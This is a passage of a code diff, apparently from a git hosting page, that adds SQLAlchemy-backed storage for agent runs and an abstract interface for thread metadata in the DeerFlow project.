follow_up_to_run_id: Mapped[str | None] = mapped_column(String(64))
|
||||
|
||||
created_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(UTC))
|
||||
updated_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(UTC), onupdate=lambda: datetime.now(UTC))
|
||||
|
||||
__table_args__ = (Index("ix_runs_thread_status", "thread_id", "status"),)
|
||||
@@ -0,0 +1,255 @@
|
||||
"""SQLAlchemy-backed RunStore implementation.
|
||||
|
||||
Each method acquires and releases its own short-lived session.
|
||||
Run status updates happen from background workers that may live
|
||||
minutes -- we don't hold connections across long execution.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
from datetime import UTC, datetime
|
||||
from typing import Any
|
||||
|
||||
from sqlalchemy import func, select, update
|
||||
from sqlalchemy.ext.asyncio import AsyncSession, async_sessionmaker
|
||||
|
||||
from deerflow.persistence.run.model import RunRow
|
||||
from deerflow.runtime.runs.store.base import RunStore
|
||||
from deerflow.runtime.user_context import AUTO, _AutoSentinel, resolve_owner_id
|
||||
|
||||
|
||||
class RunRepository(RunStore):
|
||||
def __init__(self, session_factory: async_sessionmaker[AsyncSession]) -> None:
|
||||
self._sf = session_factory
|
||||
|
||||
@staticmethod
|
||||
def _safe_json(obj: Any) -> Any:
|
||||
"""Ensure obj is JSON-serializable. Falls back to model_dump() or str()."""
|
||||
if obj is None:
|
||||
return None
|
||||
if isinstance(obj, (str, int, float, bool)):
|
||||
return obj
|
||||
if isinstance(obj, dict):
|
||||
return {k: RunRepository._safe_json(v) for k, v in obj.items()}
|
||||
if isinstance(obj, (list, tuple)):
|
||||
return [RunRepository._safe_json(v) for v in obj]
|
||||
if hasattr(obj, "model_dump"):
|
||||
try:
|
||||
return obj.model_dump()
|
||||
except Exception:
|
||||
pass
|
||||
if hasattr(obj, "dict"):
|
||||
try:
|
||||
return obj.dict()
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
json.dumps(obj)
|
||||
return obj
|
||||
except (TypeError, ValueError):
|
||||
return str(obj)
|
||||
|
||||
@staticmethod
|
||||
def _row_to_dict(row: RunRow) -> dict[str, Any]:
|
||||
d = row.to_dict()
|
||||
# Remap JSON columns to match RunStore interface
|
||||
d["metadata"] = d.pop("metadata_json", {})
|
||||
d["kwargs"] = d.pop("kwargs_json", {})
|
||||
# Convert datetime to ISO string for consistency with MemoryRunStore
|
||||
for key in ("created_at", "updated_at"):
|
||||
val = d.get(key)
|
||||
if isinstance(val, datetime):
|
||||
d[key] = val.isoformat()
|
||||
return d
|
||||
|
||||
async def put(
|
||||
self,
|
||||
run_id,
|
||||
*,
|
||||
thread_id,
|
||||
assistant_id=None,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
status="pending",
|
||||
multitask_strategy="reject",
|
||||
metadata=None,
|
||||
kwargs=None,
|
||||
error=None,
|
||||
created_at=None,
|
||||
follow_up_to_run_id=None,
|
||||
):
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="RunRepository.put")
|
||||
now = datetime.now(UTC)
|
||||
row = RunRow(
|
||||
run_id=run_id,
|
||||
thread_id=thread_id,
|
||||
assistant_id=assistant_id,
|
||||
owner_id=resolved_owner_id,
|
||||
status=status,
|
||||
multitask_strategy=multitask_strategy,
|
||||
metadata_json=self._safe_json(metadata) or {},
|
||||
kwargs_json=self._safe_json(kwargs) or {},
|
||||
error=error,
|
||||
follow_up_to_run_id=follow_up_to_run_id,
|
||||
created_at=datetime.fromisoformat(created_at) if created_at else now,
|
||||
updated_at=now,
|
||||
)
|
||||
async with self._sf() as session:
|
||||
session.add(row)
|
||||
await session.commit()
|
||||
|
||||
async def get(
|
||||
self,
|
||||
run_id,
|
||||
*,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
):
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="RunRepository.get")
|
||||
async with self._sf() as session:
|
||||
row = await session.get(RunRow, run_id)
|
||||
if row is None:
|
||||
return None
|
||||
if resolved_owner_id is not None and row.owner_id != resolved_owner_id:
|
||||
return None
|
||||
return self._row_to_dict(row)
|
||||
|
||||
async def list_by_thread(
|
||||
self,
|
||||
thread_id,
|
||||
*,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
limit=100,
|
||||
):
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="RunRepository.list_by_thread")
|
||||
stmt = select(RunRow).where(RunRow.thread_id == thread_id)
|
||||
if resolved_owner_id is not None:
|
||||
stmt = stmt.where(RunRow.owner_id == resolved_owner_id)
|
||||
stmt = stmt.order_by(RunRow.created_at.desc()).limit(limit)
|
||||
async with self._sf() as session:
|
||||
result = await session.execute(stmt)
|
||||
return [self._row_to_dict(r) for r in result.scalars()]
|
||||
|
||||
async def update_status(self, run_id, status, *, error=None):
|
||||
values: dict[str, Any] = {"status": status, "updated_at": datetime.now(UTC)}
|
||||
if error is not None:
|
||||
values["error"] = error
|
||||
async with self._sf() as session:
|
||||
await session.execute(update(RunRow).where(RunRow.run_id == run_id).values(**values))
|
||||
await session.commit()
|
||||
|
||||
async def delete(
|
||||
self,
|
||||
run_id,
|
||||
*,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
):
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="RunRepository.delete")
|
||||
async with self._sf() as session:
|
||||
row = await session.get(RunRow, run_id)
|
||||
if row is None:
|
||||
return
|
||||
if resolved_owner_id is not None and row.owner_id != resolved_owner_id:
|
||||
return
|
||||
await session.delete(row)
|
||||
await session.commit()
|
||||
|
||||
async def list_pending(self, *, before=None):
|
||||
if before is None:
|
||||
before_dt = datetime.now(UTC)
|
||||
elif isinstance(before, datetime):
|
||||
before_dt = before
|
||||
else:
|
||||
before_dt = datetime.fromisoformat(before)
|
||||
stmt = select(RunRow).where(RunRow.status == "pending", RunRow.created_at <= before_dt).order_by(RunRow.created_at.asc())
|
||||
async with self._sf() as session:
|
||||
result = await session.execute(stmt)
|
||||
return [self._row_to_dict(r) for r in result.scalars()]
|
||||
|
||||
async def update_run_completion(
|
||||
self,
|
||||
run_id: str,
|
||||
*,
|
||||
status: str,
|
||||
total_input_tokens: int = 0,
|
||||
total_output_tokens: int = 0,
|
||||
total_tokens: int = 0,
|
||||
llm_call_count: int = 0,
|
||||
lead_agent_tokens: int = 0,
|
||||
subagent_tokens: int = 0,
|
||||
middleware_tokens: int = 0,
|
||||
message_count: int = 0,
|
||||
last_ai_message: str | None = None,
|
||||
first_human_message: str | None = None,
|
||||
error: str | None = None,
|
||||
) -> None:
|
||||
"""Update status + token usage + convenience fields on run completion."""
|
||||
values: dict[str, Any] = {
|
||||
"status": status,
|
||||
"total_input_tokens": total_input_tokens,
|
||||
"total_output_tokens": total_output_tokens,
|
||||
"total_tokens": total_tokens,
|
||||
"llm_call_count": llm_call_count,
|
||||
"lead_agent_tokens": lead_agent_tokens,
|
||||
"subagent_tokens": subagent_tokens,
|
||||
"middleware_tokens": middleware_tokens,
|
||||
"message_count": message_count,
|
||||
"updated_at": datetime.now(UTC),
|
||||
}
|
||||
if last_ai_message is not None:
|
||||
values["last_ai_message"] = last_ai_message[:2000]
|
||||
if first_human_message is not None:
|
||||
values["first_human_message"] = first_human_message[:2000]
|
||||
if error is not None:
|
||||
values["error"] = error
|
||||
async with self._sf() as session:
|
||||
await session.execute(update(RunRow).where(RunRow.run_id == run_id).values(**values))
|
||||
await session.commit()
|
||||
|
||||
async def aggregate_tokens_by_thread(self, thread_id: str) -> dict[str, Any]:
|
||||
"""Aggregate token usage via a single SQL GROUP BY query."""
|
||||
_completed = RunRow.status.in_(("success", "error"))
|
||||
_thread = RunRow.thread_id == thread_id
|
||||
|
||||
stmt = (
|
||||
select(
|
||||
func.coalesce(RunRow.model_name, "unknown").label("model"),
|
||||
func.count().label("runs"),
|
||||
func.coalesce(func.sum(RunRow.total_tokens), 0).label("total_tokens"),
|
||||
func.coalesce(func.sum(RunRow.total_input_tokens), 0).label("total_input_tokens"),
|
||||
func.coalesce(func.sum(RunRow.total_output_tokens), 0).label("total_output_tokens"),
|
||||
func.coalesce(func.sum(RunRow.lead_agent_tokens), 0).label("lead_agent"),
|
||||
func.coalesce(func.sum(RunRow.subagent_tokens), 0).label("subagent"),
|
||||
func.coalesce(func.sum(RunRow.middleware_tokens), 0).label("middleware"),
|
||||
)
|
||||
.where(_thread, _completed)
|
||||
.group_by(func.coalesce(RunRow.model_name, "unknown"))
|
||||
)
|
||||
|
||||
async with self._sf() as session:
|
||||
rows = (await session.execute(stmt)).all()
|
||||
|
||||
total_tokens = total_input = total_output = total_runs = 0
|
||||
lead_agent = subagent = middleware = 0
|
||||
by_model: dict[str, dict] = {}
|
||||
for r in rows:
|
||||
by_model[r.model] = {"tokens": r.total_tokens, "runs": r.runs}
|
||||
total_tokens += r.total_tokens
|
||||
total_input += r.total_input_tokens
|
||||
total_output += r.total_output_tokens
|
||||
total_runs += r.runs
|
||||
lead_agent += r.lead_agent
|
||||
subagent += r.subagent
|
||||
middleware += r.middleware
|
||||
|
||||
return {
|
||||
"total_tokens": total_tokens,
|
||||
"total_input_tokens": total_input,
|
||||
"total_output_tokens": total_output,
|
||||
"total_runs": total_runs,
|
||||
"by_model": by_model,
|
||||
"by_caller": {
|
||||
"lead_agent": lead_agent,
|
||||
"subagent": subagent,
|
||||
"middleware": middleware,
|
||||
},
|
||||
}
|
||||
@@ -0,0 +1,13 @@
|
||||
"""Thread metadata persistence — ORM, abstract store, and concrete implementations."""
|
||||
|
||||
from deerflow.persistence.thread_meta.base import ThreadMetaStore
|
||||
from deerflow.persistence.thread_meta.memory import MemoryThreadMetaStore
|
||||
from deerflow.persistence.thread_meta.model import ThreadMetaRow
|
||||
from deerflow.persistence.thread_meta.sql import ThreadMetaRepository
|
||||
|
||||
__all__ = [
|
||||
"MemoryThreadMetaStore",
|
||||
"ThreadMetaRepository",
|
||||
"ThreadMetaRow",
|
||||
"ThreadMetaStore",
|
||||
]
|
||||
@@ -0,0 +1,60 @@
|
||||
"""Abstract interface for thread metadata storage.
|
||||
|
||||
Implementations:
|
||||
- ThreadMetaRepository: SQL-backed (sqlite / postgres via SQLAlchemy)
|
||||
- MemoryThreadMetaStore: wraps LangGraph BaseStore (memory mode)
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import abc
|
||||
|
||||
|
||||
class ThreadMetaStore(abc.ABC):
|
||||
@abc.abstractmethod
|
||||
async def create(
|
||||
self,
|
||||
thread_id: str,
|
||||
*,
|
||||
assistant_id: str | None = None,
|
||||
owner_id: str | None = None,
|
||||
display_name: str | None = None,
|
||||
metadata: dict | None = None,
|
||||
) -> dict:
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def get(self, thread_id: str) -> dict | None:
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def search(
|
||||
self,
|
||||
*,
|
||||
metadata: dict | None = None,
|
||||
status: str | None = None,
|
||||
limit: int = 100,
|
||||
offset: int = 0,
|
||||
) -> list[dict]:
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def update_display_name(self, thread_id: str, display_name: str) -> None:
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def update_status(self, thread_id: str, status: str) -> None:
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def update_metadata(self, thread_id: str, metadata: dict) -> None:
|
||||
"""Merge ``metadata`` into the thread's metadata field.
|
||||
|
||||
Existing keys are overwritten by the new values; keys absent from
|
||||
``metadata`` are preserved. No-op if the thread does not exist.
|
||||
"""
|
||||
pass
|
||||
|
||||
@abc.abstractmethod
|
||||
async def delete(self, thread_id: str) -> None:
|
||||
pass
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user